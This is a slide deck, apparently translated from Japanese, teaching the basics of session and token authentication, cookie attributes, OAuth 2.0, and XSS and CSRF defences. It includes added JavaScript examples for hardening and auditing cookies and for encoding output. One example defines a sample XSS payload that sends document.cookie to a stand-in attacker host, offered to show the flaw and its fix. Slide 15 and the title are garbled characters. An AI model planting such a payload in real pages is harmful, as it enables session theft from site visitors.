Slide 1

ਔՊ ढ़੖
Basics worth knowing to understand how authentication and authorization work

Slide 2

Agenda
• What this talk covers
• Session basics
• Authentication and authorization
• Concrete ways to implement authentication
• Summary

Slide 3

Agenda (section divider; same list as Slide 2)

Slide 4

What this talk covers
• The difference between authentication and authorization
• The difference between session authentication and token authentication
• The security risks of authentication: XSS and CSRF

Sharing an overview and the basics of authentication and authorization. When splitting a monolithic application into services, deciding how authentication and authorization will be implemented cannot be avoided. As groundwork for that decision, this talk summarizes the basics of authentication and authorization.

Slide 5

Agenda (section divider; same list as Slide 2)

Slide 6

Stateful vs. stateless
Data communication comes in two kinds: stateful and stateless.
• Stateful
  • Keeps track of the current state across messages
  • Examples: FTP, TCP, BGP, OSPF, EIGRP, SMTP, SSH
• Stateless
  • Keeps no state between messages; each one must carry everything needed to handle it
  • Examples: HTTP, UDP, IP, DNS
(HTTP is stateless at the request level even though a persistent TCP connection underneath is stateful: the server does not remember one request when handling the next.)

Slide 7

A stateful exchange (the staff member remembers the earlier answers)
Staff: What would you like to order?
Customer: A hamburger set, please.
Staff: Which drink with the set?
Customer: A cola, please.
Staff: Will you be eating in?
Customer: Yes.

Slide 8

A stateless exchange (nothing is remembered, so every request must repeat the full context)
Staff: What would you like to order? If you want a set, please also order a drink. When ordering, please tell us whether you will eat in.
Customer: A hamburger set, please.
Customer: A hamburger set and a cola, please.
Customer: A hamburger set and a cola, please. I'll eat in.

Slide 9

Why sessions are needed
• Websites use HTTP, which is stateless
• In practice a site needs to behave differently depending on state, for example the shopping cart on an e-commerce site
A session is the mechanism that provides stateful behaviour on top of stateless HTTP.

Slide 10

Where session information is stored
On the client (the browser) there are two kinds of storage: cookies and Web Storage.
• Cookie
• Web Storage
  • SessionStorage
  • LocalStorage

Slide 11

Where session information is stored: Cookie
• Used to manage the server-side session: the cookie normally carries only a session ID, and the session data itself stays on the server
• Each cookie is limited to about 4 KB; browsers drop cookies larger than that
• The browser sends matching cookies automatically on every request from the client to the server (subject to the cookie's Domain, Path, Secure and SameSite attributes)
• The server sets a cookie by putting it in the Set-Cookie response header, together with those attributes
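The attributes that control the automatic sending described above travel in the same Set-Cookie header, so the place to get a session cookie right is where it is emitted. The following is an added example (not code from the slides): a small Node.js helper that builds a hardened session cookie header, enforces the 4 KB limit, and audits any Set-Cookie value for the weak settings the later slides warn about. The cookie name `sid` and the values are constructed for the example.

```javascript
// Added example: build and audit Set-Cookie headers for a session cookie.
// Not from the slides; the cookie names and values are constructed.

const MAX_COOKIE_BYTES = 4096; // per-cookie size limit browsers enforce (RFC 6265 minimum)

// Emit a Set-Cookie value. Defaults are the hardened form: Secure (HTTPS only),
// HttpOnly (not visible to document.cookie) and SameSite=Lax (not attached to
// cross-site POSTs). Pass overrides only when you deliberately need a weaker cookie.
function setCookieHeader(name, value, attrs = {}) {
  const a = { path: '/', httpOnly: true, secure: true, sameSite: 'Lax', ...attrs };
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (a.maxAge !== undefined) parts.push(`Max-Age=${a.maxAge}`);
  if (a.domain) parts.push(`Domain=${a.domain}`);
  parts.push(`Path=${a.path}`);
  if (a.secure) parts.push('Secure');
  if (a.httpOnly) parts.push('HttpOnly');
  if (a.sameSite) parts.push(`SameSite=${a.sameSite}`);
  const header = parts.join('; ');
  if (Buffer.byteLength(header) > MAX_COOKIE_BYTES) {
    // Oversized cookies are silently dropped by browsers: keep only a session
    // id in the cookie and store the session data on the server.
    throw new Error(`cookie exceeds ${MAX_COOKIE_BYTES} bytes`);
  }
  return header;
}

// Parse a Set-Cookie value into its name, value and the attributes audited below.
function parseSetCookie(header) {
  const [pair, ...attrParts] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: decodeURIComponent(pair.slice(eq + 1)),
                   secure: false, httpOnly: false, sameSite: null, path: '/' };
  for (const p of attrParts) {
    const [k, v] = p.split('=');
    switch (k.toLowerCase()) {
      case 'secure': cookie.secure = true; break;
      case 'httponly': cookie.httpOnly = true; break;
      case 'samesite': cookie.sameSite = v; break;
      case 'path': cookie.path = v; break;
    }
  }
  return cookie;
}

// Audit a Set-Cookie value the way a reviewer would: returns the list of
// weaknesses, empty when the cookie is set the hardened way.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly: injected script can read the cookie (XSS)');
  if (!c.secure) findings.push('missing Secure: cookie also travels over plain HTTP');
  if (!c.sameSite) findings.push('missing SameSite: falls back to the browser default, which differs between browsers');
  else if (c.sameSite === 'None' && !c.secure) findings.push('SameSite=None without Secure: browsers reject this combination');
  if (Buffer.byteLength(header) > MAX_COOKIE_BYTES) findings.push('over 4096 bytes: the browser will drop the cookie');
  return findings;
}

// What an injected script would see through document.cookie: HttpOnly cookies are hidden.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders.map(parseSetCookie)
    .filter(c => !c.httpOnly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}
```

`setCookieHeader('sid', id)` produces `sid=…; Path=/; Secure; HttpOnly; SameSite=Lax`, which is the shape a session cookie should have; the audit function is handy for checking what a framework actually emits before trusting its defaults.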

Slide 12

Where session information is stored: Web Storage
• Manages state on the client side
• Behaves like a small key-value database available to client-side JavaScript, scoped to the page's origin
• SessionStorage: available only while that browser tab or window is open; each tab gets its own copy
• LocalStorage: persists data until the page or the user explicitly removes it
Unlike cookies, Web Storage is never sent to the server automatically; if a value has to reach the server, script must add it to the request.

Slide 13

Agenda (section divider; same list as Slide 2)

Slide 14

Authentication vs. authorization
• Authentication
  • Confirming who someone is
  • Examples: password authentication, fingerprint authentication
  • The error for failed authentication is 401 Unauthorized (despite the name, it means "not authenticated")
• Authorization
  • Granting permission to perform an operation
  • Example: access to a page with viewing restrictions
  • The error for insufficient permissions is 403 Forbidden

Slide 15

Slide 15 text

 ೝূͷख๏ʹ͍ͭͯ ηογϣϯ΂ʔεͷೝূ
 ʢεςʔτϑϧʣ τʔΫϯϕʔεͷೝূ
 ʢεςʔτϨεʣ

Slide 16

Session-based authentication
1. The client POSTs its credentials
2. After successful authentication, session information (a session ID) is returned, normally in a Set-Cookie header
3. The client sends that session information on subsequent requests, and the server looks the session up to authorize them

Slide 17

Token-based authentication (1/3)
1. The client POSTs its credentials
2. After successful authentication, a token is returned
3. The client presents the token on subsequent requests, and the server validates it to authorize them
  • Method 1: send the token in the Authorization header (Authorization: Bearer <token>)
  • Method 2: store the token in a cookie

Slide 18

Token-based authentication (2/3): kinds of token
• Identifier-type (opaque) token
  • The token is a random identifier; the information it stands for is kept in a database on the server and looked up on each request, so it can be revoked by deleting the row
• Self-contained token
  • The information tied to the access token is embedded in the token itself, as claims protected by a signature
  • JWT is a self-contained token
  • The payload is only base64url-encoded, not encrypted: whoever holds the token can read the claims, and a token cannot be revoked individually without extra server state, so keep exp short
Example payload of a self-contained token (values abbreviated on the slide):
{ "scope": "xxx", "client_id": "xxx", "exp": "xxx", "iat": "xxx", "sub": "xxx", "iss": "xxx", "jti": "xxx" }
[Diagram: self-contained vs. identifier-type token]

Slide 19

Token-based authentication (3/3): OAuth 2.0
• OAuth 2.0 (RFC 6749) standardizes how tokens are requested and returned: the endpoints, the request parameters and the response format. It does not standardize the access token format itself; to the client the token is an opaque string (a JWT profile for access tokens was specified separately in RFC 9068).
• It standardizes authorization; authenticating the end user is out of scope (OpenID Connect adds that on top of OAuth 2.0)
• Grant types standardized in OAuth 2.0:
  • Authorization code grant
  • Implicit grant
  • Resource owner password credentials grant
  • Client credentials grant
  • Refreshing an access token with a refresh token
The implicit and resource owner password credentials grants are deprecated by the OAuth 2.0 Security Best Current Practice (RFC 9700); new deployments should use the authorization code grant with PKCE.

Slide 20

Security risks in authentication and authorization
• XSS (cross-site scripting)
  • A vulnerability in which attacker-controlled JavaScript runs in the victim's browser within the site's origin, so that secrets such as session information can be stolen or requests sent as the victim
  • The script executes on the client side, but the underlying flaw is usually that untrusted input is inserted into the page without encoding, either by the server or by client-side code
• CSRF (cross-site request forgery)
  • A vulnerability in which the server accepts a request forged by another site and carries out an operation the user did not intend
  • The flaw is on the server side: it cannot tell a request the user meant to send from one a malicious page made the browser send, because the browser attaches cookies automatically in both cases
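The XSS half of the slide in code: a rendering function that splices untrusted text straight into HTML, next to the same function with output encoding. This is an added example, not from the slides; the comment text and the payload are constructed, and `escapeHtml` is this example's own helper for the HTML text context (attribute, URL and script contexts need their own encoders).

```javascript
// Added example: XSS through unencoded output, and the encoded version.
// Not from the slides; the payload and inputs are constructed.

// A constructed attacker comment: if rendered as-is it runs in every visitor's
// browser and ships document.cookie to the attacker's host (made-up name).
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable: untrusted author and text are concatenated into markup.
function renderCommentVulnerable(author, text) {
  return `<li><b>${author}</b>: ${text}</li>`;
}

// Encode the five characters that can change HTML structure in a text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Hardened: the same template, but every untrusted value goes through escapeHtml.
function renderCommentSafe(author, text) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</li>`;
}

// Crude detector used only to compare the two renderers: does the output contain
// a <script> element (a real check would parse the HTML).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Encoding at output time is the primary defence; the HttpOnly cookie attribute discussed later limits what a successful XSS can steal but does not prevent the injection itself, and a Content Security Policy can be added as a further layer.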

Slide 21

Agenda (section divider; same list as Slide 2)

Slide 22

Summary of authentication and authorization approaches
Four variants are covered: one session-based and three token-based.
• Session-based
  • Session ID stored in a cookie; the browser sends the cookie automatically with each request
• Token-based
  • Stored in a cookie; the browser sends the cookie automatically with each request
  • Stored in a cookie; script reads it and sends it in the Authorization header
  • Stored in LocalStorage; script reads it and sends it in the Authorization header
Reference: a Qiita article (https://qiita.com/…; the rest of the URL is garbled in the extracted text)

Slide 23

Session-based
Because the cookie is sent automatically, the server cannot tell a forged request from a legitimate one by the cookie alone, so a CSRF defence is required.
• XSS mitigation
  • Set the HttpOnly attribute on the cookie so JavaScript cannot read it (this protects the session ID from theft; it does not stop the XSS itself, and injected script can still issue requests that carry the cookie)
  • Also set Secure and an appropriate SameSite value
• CSRF mitigation
  • A CSRF token (synchronizer token) that the server checks on every state-changing request
  • Require the password to be entered again for sensitive operations
  • SameSite=Lax or Strict on the session cookie stops the browser from attaching it to cross-site POSTs; treat this as defence in depth rather than a replacement for the token

Slide 24

Token-based: stored in a cookie, sent automatically
Same as the session-based case.
• XSS mitigation
  • Set HttpOnly (plus Secure and SameSite) on the cookie so JavaScript cannot read the token
• CSRF mitigation
  • CSRF token
  • Require the password to be entered again for sensitive operations

Slide 25

Token-based: stored in a cookie, sent in a header
To copy the token from the cookie into the Authorization header, script has to be able to read the cookie, so the cookie cannot be HttpOnly and the token is exposed to XSS.
• XSS mitigation
  • Use the framework's output encoding, and use its tooling to check that the libraries in use have no known vulnerabilities; add a Content Security Policy as defence in depth
• CSRF mitigation
  • Not needed for this pattern: the server validates the header, not the cookie, and a page on another site cannot read the cookie to build that header

Slide 26

Token-based: stored in LocalStorage, sent in a header
LocalStorage is readable from JavaScript, so the token is exposed to XSS.
• XSS mitigation
  • Use the framework's output encoding, and use its tooling to check that the libraries in use have no known vulnerabilities; add a Content Security Policy as defence in depth
• CSRF mitigation
  • Not needed: LocalStorage data is never sent automatically with a request, and it is scoped to the origin, so a page on another site can neither read it nor make the browser attach it

Slide 27

Agenda (section divider; same list as Slide 2)

Slide 28

Summary
• Authentication confirms who someone is; authorization grants permission to perform operations
• There are two families of authentication: session-based and token-based
• When implementing authentication, keep the XSS and CSRF vulnerabilities in mind: where the credential is stored (HttpOnly cookie vs. script-readable storage) decides which of the two you must defend against